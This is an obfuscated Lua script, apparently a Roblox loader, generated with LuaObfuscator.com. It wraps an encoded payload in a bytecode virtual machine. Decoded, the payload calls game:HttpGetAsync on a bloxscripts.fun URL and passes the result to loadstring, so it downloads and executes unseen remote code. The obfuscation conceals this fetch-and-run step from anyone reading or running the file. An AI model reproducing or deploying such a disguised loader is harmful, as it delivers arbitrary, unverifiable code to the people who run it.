--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==4) then function v16(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v39)if (v2(v39,2)==79) then v28=v1(v4(v39,1,1));return "";else local v75=v3(v1(v39,16));if v28 then local v84=v6(v75,v28);v28=nil;return v84;else return v75;end end end);local function v29(v40,v41,v42)if v42 then local v76=1828 -(35 + 1793) ;local v77;while true do if (v76==(0 + (1412 -(855 + 557)))) then v77=(v40/((2 + 0)^(v41-(980 -(566 + 413)))))%((4 -2)^(((v42-1) -(v41-(1957 -(518 + 1438)))) + 1 + 0)) ;return v77-(v77%(1 + 0)) ;end end else local v78=(1567 -(309 + 1256))^(v41-(1 + 0)) ;return (((v40%(v78 + v78))>=v78) and (2 -1)) or 0 ;end end local function v30()local v47=v2(v25,v27,v27);v27=v27 + 1 ;return v47;end local function v31()local v48,v49=v2(v25,v27,v27 + (2 -0) );v27=v27 + 2 ;return (v49 * (521 -(55 + 210))) + v48 ;end local function v32()local v50,v51,v52,v53=v2(v25,v27,v27 + 3 );v27=v27 + (19 -15) ;return (v53 * (31238986 -(14462927 -(398 + 759)))) + (v52 * (29813 + 35723)) + (v51 * (1184 -(150 + 778))) + v50 ;end local function v33()local v54=(0 + 0) -0 ;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v54==1) then v57=1 + 0 ;v58=(v29(v56,972 -(145 + 826) ,1763 -(32 + 1711) ) * ((1250 -(1010 + 238))^(41 -(4 + 5)))) + v55 ;v54=(5 -3) + (494 -(353 + 141)) ;end if ((4 -2)==v54) then v59=v29(v56,40 -19 ,16 + 15 );v60=((v29(v56,32)==(4 -3)) and  -((315 + 45) -(259 + 100))) or (517 -(152 + 74 + 290)) ;v54=(360 -(52 + 304)) -1 ;end if (v54==3) then if (v59==(0 + 0)) then if (v58==(0 + 0)) then return v60 * (0 -0) ;else v59=1 -0 ;v57=(3989 -2258) -(802 + 929) ;end elseif (v59==(4173 -2126)) then return ((v58==0) and (v60 * ((1 + 0)/(0 + 0)))) or (v60 * NaN) ;end return v9(v60,v59-((5990 -2464) -2503) ) * (v57 + (v58/((3 -1)^52))) ;end if (v54==(1325 -(440 + (2783 -(1790 + 108))))) then v55=v32();v56=v32();v54=1;end end end local function v34(v43)local v61=0 + 0 ;local v62;local v63;while true do if (v61==(0 + 0)) then v62=nil;if  not v43 then v43=v32();if (v43==(0 -0)) then return "";end end v61=2 -1 ;end if (v61==(1716 -(1556 + 157))) then return v7(v63);end if ((1 + 0)==v61) then v62=v4(v25,v27,(v27 + v43) -(756 -(663 + 92)) );v27=v27 + v43 ;v61=5 -3 ;end if (v61==(7 -5)) then v63={};for v85=1 + (0 -0) , #v62 do v63[v85]=v3(v2(v4(v62,v85,v85)));end v61=970 -(403 + 564) ;end end end local v35=v32;local function v36(...)return {...},v13("#",...);end local function v37()local v64=0;local v65;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v64~=3) then else v71=nil;while true do if (v65==0) then local v101=0;while true do if (v101~=(1537 -(7 + 1530))) then else v66={};v67={};v101=1;end if (v101==(1 + 0)) then v68={};v69={v66,v67,nil,v68};v101=2;end if (v101==(1230 -(1004 + 224))) then v65=2 -1 ;break;end end end if (v65==(3 -2)) then local v102=0 -0 ;while true do if (v102==(0 -0)) then v70=v32();v71={};v102=2 -1 ;end if (v102==2) then v65=1 + 1 ;break;end if (1==v102) then for v109=1,v70 do local v110=0 + 0 ;local v111;local v112;local v113;while true do if (v110==(0 + 0)) then v111=0 -0 ;v112=nil;v110=1;end if ((1 + 0)==v110) then v113=nil;while true do if (v111==0) then v112=v30();v113=nil;v111=3 -2 ;end if (v111==(1 + 0)) then if (v112==1) then v113=v30()~=(0 -0) ;elseif (v112==(635 -(294 + 339))) then v113=v33();elseif (v112~=(3 + 0)) then else v113=v34();end v71[v109]=v113;break;end end break;end end end v69[12 -9 ]=v30();v102=5 -3 ;end end end if (v65==(7 -5)) then local v103=0 + 0 ;while true do if (v103~=(0 -0)) then else for v114=26 -(15 + 10) ,v32() do local v115=0 + 0 ;local v116;local v117;local v118;while true do if (v115==(330 -(308 + 22))) then v116=302 -(54 + 248) ;v117=nil;v115=305 -(292 + 12) ;end if ((1 + 0)~=v115) then else v118=nil;while true do if (v116==(1 + 0)) then while true do if (v117==(0 -0)) then v118=v30();if (v29(v118,1 + 0 ,1 + 0 )==(0 -0)) then local v147=177 -(58 + 119) ;local v148;local v149;local v150;local v151;local v152;local v153;while true do if (v147==(1687 -(966 + 720))) then v150=nil;v151=nil;v147=424 -(115 + 307) ;end if (v147~=2) then else v152=nil;v153=nil;v147=1 + 2 ;end if (v147==(0 + 0)) then v148=0 + 0 ;v149=nil;v147=457 -(173 + 283) ;end if (v147==(1422 -(460 + 959))) then while true do if (v148==(1 + 0)) then local v168=0;while true do if (v168~=1) then else v148=2;break;end if (v168~=0) then else v151=nil;v152=nil;v168=1 -0 ;end end end if (v148==(1105 -(915 + 190))) then local v169=590 -(582 + 8) ;while true do if (v169==0) then v149=1573 -(244 + 1329) ;v150=nil;v169=1 + 0 ;end if (v169==(1042 -(355 + 686))) then v148=2 -1 ;break;end end end if (v148==(2 + 0)) then v153=nil;while true do if (v149~=0) then else v150=0 + 0 ;v151=nil;v149=134 -(109 + 24) ;end if (v149==(2 -1)) then local v170=0;while true do if (1==v170) then v149=2;break;end if ((0 + 0)~=v170) then else v152=nil;v153=nil;v170=1 + 0 ;end end end if (v149==(1076 -(533 + 541))) then while true do if (v150==(2 + 0)) then local v173=0 -0 ;local v174;while true do if (v173~=(0 -0)) then else v174=0 + 0 ;while true do if (v174==1) then v150=3 + 0 ;break;end if (v174==(967 -(662 + 305))) then local v186=0 + 0 ;while true do if (v186~=0) then else if (v29(v152,3 -2 ,1 + 0 )~=1) then else v153[1369 -(1160 + 207) ]=v71[v153[2]];end if (v29(v152,2 + 0 ,2)~=(245 -(179 + 65))) then else v153[354 -(104 + 247) ]=v71[v153[3]];end v186=2 -1 ;end if (v186==(1 -0)) then v174=2 -1 ;break;end end end end break;end end end if (3==v150) then if (v29(v152,3,3 + 0 )~=(766 -(239 + 526))) then else v153[925 -(386 + 535) ]=v71[v153[15 -11 ]];end v66[v114]=v153;break;end if ((1149 -(556 + 592))==v150) then local v176=1640 -(753 + 887) ;local v177;local v178;while true do if ((3 -2)==v176) then while true do if (v177~=0) then else v178=0 -0 ;while true do if (v178==(0 -0)) then local v187=0 + 0 ;local v188;while true do if (v187~=0) then else v188=826 -(701 + 125) ;while true do if (v188==(0 + 0)) then v153={v31(),v31(),nil,nil};if (v151==(0 -0)) then local v194=0;local v195;while true do if (v194~=(0 -0)) then else v195=0;while true do if (v195==(545 -(70 + 475))) then v153[11 -8 ]=v31();v153[4]=v31();break;end end break;end end elseif (v151==(1 -0)) then v153[5 -2 ]=v32();elseif (v151==(2 + 0)) then v153[3]=v32() -((4 -2)^(212 -(139 + 57))) ;elseif (v151==(915 -(281 + 631))) then local v200=0 -0 ;local v201;local v202;while true do if ((3 -2)==v200) then while true do if (0~=v201) then else v202=1061 -(608 + 453) ;while true do if (v202==(1786 -(1019 + 767))) then v153[1 + 2 ]=v32() -((680 -(304 + 374))^(3 + 13)) ;v153[1295 -(1097 + 194) ]=v31();break;end end break;end end break;end if (v200==(1625 -(152 + 1473))) then v201=0 + 0 ;v202=nil;v200=1;end end end v188=1;end if ((88 -(35 + 52))==v188) then v178=1;break;end end break;end end end if (v178~=(1704 -(1045 + 658))) then else v150=546 -(18 + 526) ;break;end end break;end end break;end if ((0 -0)~=v176) then else v177=0 -0 ;v178=nil;v176=1;end end end if ((0 + 0)~=v150) then else local v179=0 + 0 ;while true do if (v179==(0 + 0)) then local v184=0 + 0 ;local v185;while true do if (v184~=(0 -0)) then else v185=0 + 0 ;while true do if (v185==1) then v179=768 -(122 + 645) ;break;end if (v185==0) then local v189=0 -0 ;while true do if (v189==(1 + 0)) then v185=1 + 0 ;break;end if (v189==0) then v151=v29(v118,9 -7 ,1825 -(1697 + 125) );v152=v29(v118,4,1872 -(694 + 1172) );v189=2 -1 ;end end end end break;end end end if (v179~=(555 -(522 + 32))) then else v150=1;break;end end end end break;end end break;end end break;end end end break;end end break;end if (v116==(0 + 0)) then local v127=0 + 0 ;while true do if ((770 -(296 + 474))==v127) then v117=0 + 0 ;v118=nil;v127=3 -2 ;end if (1==v127) then v116=2 -1 ;break;end end end end break;end end end for v119=1 + 0 ,v32() do v67[v119-(2 -1) ]=v37();end v103=1 + 0 ;end if ((1 + 0)==v103) then for v121=1,v32() do v68[v121]=v32();end return v69;end end end end break;end if (v64==(1209 -(384 + 824))) then v67=nil;v68=nil;v64=6 -4 ;end if (v64==(1911 -(525 + 1386))) then v65=0 + 0 ;v66=nil;v64=1;end if ((2 + 0)==v64) then v69=nil;v70=nil;v64=1 + 2 ;end end end local function v38(v44,v45,v46)local v72=v44[1];local v73=v44[2];local v74=v44[3];return function(...)local v79=1;local v80= -1;local v81={...};local v82=v13("#",...) -1 ;local function v83()local v87=v72;local v88=v73;local v89=v74;local v90=v36;local v91={};local v92={};local v93={};for v98=0 -0 ,v82 do if ((v98>=v89) or ((1145 -(1459 -865))==(1517 -((1443 -(280 + 1136)) + 36)))) then v91[v98-v89 ]=v81[v98 + (901 -(529 + 371)) ];else v93[v98]=v81[v98 + (1 -(0 + 0)) ];end end local v94=(v82-v89) + (1920 -(58 + 1861)) ;local v95;local v96;while true do local v99=0 + 0 ;local v100;while true do if ((v99==(0 -0)) or (3104>=(1189 + 1924))) then v100=(0 -0) -(0 + 0) ;while true do if (((222 + 15 + 85)<=3410) and (v100==(0 -(527 -(79 + 448))))) then local v123=1359 -((1330 -(448 + 228)) + 705) ;while true do if ((v123==(1839 -(1310 + 528))) or (3026>=(6361 -(1757 + 95)))) then v100=1 -0 ;break;end if ((v123==(1122 -(877 + 245))) or ((3413 + 1225)<=(764 + 1409))) then v95=v87[v79];v96=v95[(539 -127) -(269 + 142) ];v123=3 -2 ;end end end if ((v100==(1 + (1413 -(751 + 662)))) or ((1600 -(9 + 76 + 148))==(479 + 914))) then if ((v96<=(467 -(349 + (385 -270)))) or ((5146 -(584 + 668))==(4800 -(156 + 1090)))) then if ((v96<=((1044 -(291 + 635)) -(116 + 1))) or ((1308 + (5032 -3509))<=(2878 -(318 + 476)))) then if ((1725<=(3427 -((197 -87) + 536))) and (v96==(669 -(224 + 445)))) then v93[v95[1138 -(918 + 218) ]]();else do return;end end elseif ((v96==(2 + 0)) or ((154 + 320)>=3125)) then v93[v95[2]]=v95[1 + 2 ]~=((0 + 0) -0) ;else local v129=(1262 -(1086 + 176)) -0 ;local v130;local v131;local v132;local v133;local v134;while true do if ((4757>=(1792 -(1405 + 3))) and (v129==(2 + 0))) then v134=nil;while true do if (((2526 -(959 + 845))<=(2160 -(326 + 616))) and (v130==((13 -10) -2))) then local v154=0 -0 ;while true do if (((939 + 20)>=(1209 -(407 + 29))) and (v154==(3 -2))) then v130=59 -(33 + 24) ;break;end if ((((2593 + 2392) -2516)<(12070 -7232)) and (v154==0)) then v80=(v133 + v131) -(1 + 0) ;v134=0 -0 ;v154=1306 -(120 + 1185) ;end end end if ((v130==(2 -0)) or ((2227 -(299 + 335))==(2702 -(7832 -5948)))) then for v158=v131,v80 do local v159=0 -0 ;local v160;local v161;while true do if ((v159==1) or ((1146 -(694 + 439))==3652)) then while true do if ((v160==(0 + 0)) or ((1706 -658)>(942 + 299))) then v161=1690 -(743 + 947) ;while true do if (((5370 -(331 + 323))>=(133 + 27)) and (v161==(1130 -(882 + 248)))) then v134=v134 + 1 ;v93[v158]=v132[v134];break;end end break;end end break;end if ((2927==(2284 + 473 + 170)) and (v159==(0 -(1615 -(1444 + 171))))) then v160=0 + 0 ;v161=nil;v159=1 + 0 ;end end end break;end if ((v130==0) or ((3136 -(159 + 85))<522)) then local v155=(1121 -(999 + 122)) -0 ;while true do if ((v155==(1 + 0)) or (4999<=(7916 -5190))) then v130=1;break;end if (((1376 -((2624 -1561) + 313))==v155) or ((4299 -(20 + 585))<=1225)) then v131=v95[(2 + 2) -2 ];v132,v133=v90(v93[v131](v14(v93,v131 + (81 -((304 -(126 + 151)) + 53)) ,v95[613 -(366 + 244) ])));v155=1 + 0 ;end end end end break;end if ((v129==(0 + 0)) or ((454 + (3063 -(1114 + 186)))>(3249 -(721 + 27)))) then v130=0;v131=nil;v129=1;end if ((v129==(620 -(504 + 115))) or ((2423 -753)<(1242 + 313))) then v132=nil;v133=nil;v129=1 + 1 ;end end end elseif ((v96<=(1866 -(748 + 1113))) or ((513 + 523)>=(6950 -2061))) then if ((v96>(1 + 0 + 3)) or ((3734 + 251)<(635 -(1461 -(56 + 1057))))) then local v135=(463 + 1277) -(382 + 1358) ;local v136;local v137;local v138;local v139;while true do if (((1561 -(1211 + 177))<1573) and ((2 + 0)==v135)) then while true do if ((v136==(1 + 0)) or ((6968 -4582)>=4745)) then v139=nil;while true do if ((v137==(74 -(70 + 4))) or ((319 + 3984)==3078)) then local v163=0;local v164;while true do if ((v163==(0 + 0)) or ((16811 -(14465 -(840 + 1148)))<=(9710 -7072))) then v164=0;while true do if (((1987 -(1180 + 286))<(924 + 2560)) and (v164==(2 -(233 -(127 + 105))))) then v137=1751 -(254 + 1496) ;break;end if ((((1872 + 1873) -(53 + 1629))<2265) and (v164==0)) then v138=v95[2 + 0 + 0 ];v139=v93[v95[5 -2 ]];v164=1;end end break;end end end if ((v137==(865 -(502 + 362))) or ((4263 -(528 + 19))>(6167 -(75 + 13 + 365 + 929)))) then v93[v138 + (2 -(180 -(107 + 72))) ]=v139;v93[v138]=v139[v95[1219 -(301 + (2161 -(303 + 944))) ]];break;end end break;end if ((v136==(562 -(167 + 287 + 108))) or (((511 -277) + 1675)==(11408 -6897))) then v137=0 + 0 ;v138=nil;v136=1540 -(734 + 805) ;end end break;end if (((2053 -(629 + 564 + 174))<2292) and (v135==(3 -2))) then v138=nil;v139=nil;v135=1 + 1 ;end if (((2947 -1788)<=(2852 -1243)) and (v135==0)) then v136=0;v137=nil;v135=1;end end else v93[v95[(1991 -(634 + 1349)) -6 ]]=v95[2 + 1 ];end elseif ((v96>(1958 -(153 + 1799))) or ((2122 + 1820)<850)) then local v142=0 + 0 ;local v143;local v144;while true do if (((1340 + 286 + 1030)<=(2589 + 116)) and (v142==(0 -0))) then v143=0 + 0 ;v144=nil;v142=19 -(4 + 14) ;end if ((v142==1) or ((2508 + 584)<=((62 -43) + 201))) then while true do if ((2259<=(18122 -13320)) and ((0 -0)==v143)) then v144=v95[2 + 0 ];v93[v144]=v93[v144](v14(v93,v144 + 1 ,v80));break;end end break;end end else v93[v95[1 + 1 ]]=v46[v95[2 + 1 ]];end v79=v79 + (1 -0) ;break;end end break;end end end end A,B=v36(v12(v83));if  not A[1] then local v97=v44[4][v79] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v38(v37(),{},v26)(...);end v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032E3O00682O7470733A2O2F626C6F78736372697074732E66756E2F736372697074732F313365373863666230662E6C756100093O0012063O00013O001206000100023O002005000100010003001204000300044O0002000400014O0003000100044O00075O00026O000100012O00013O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end end end
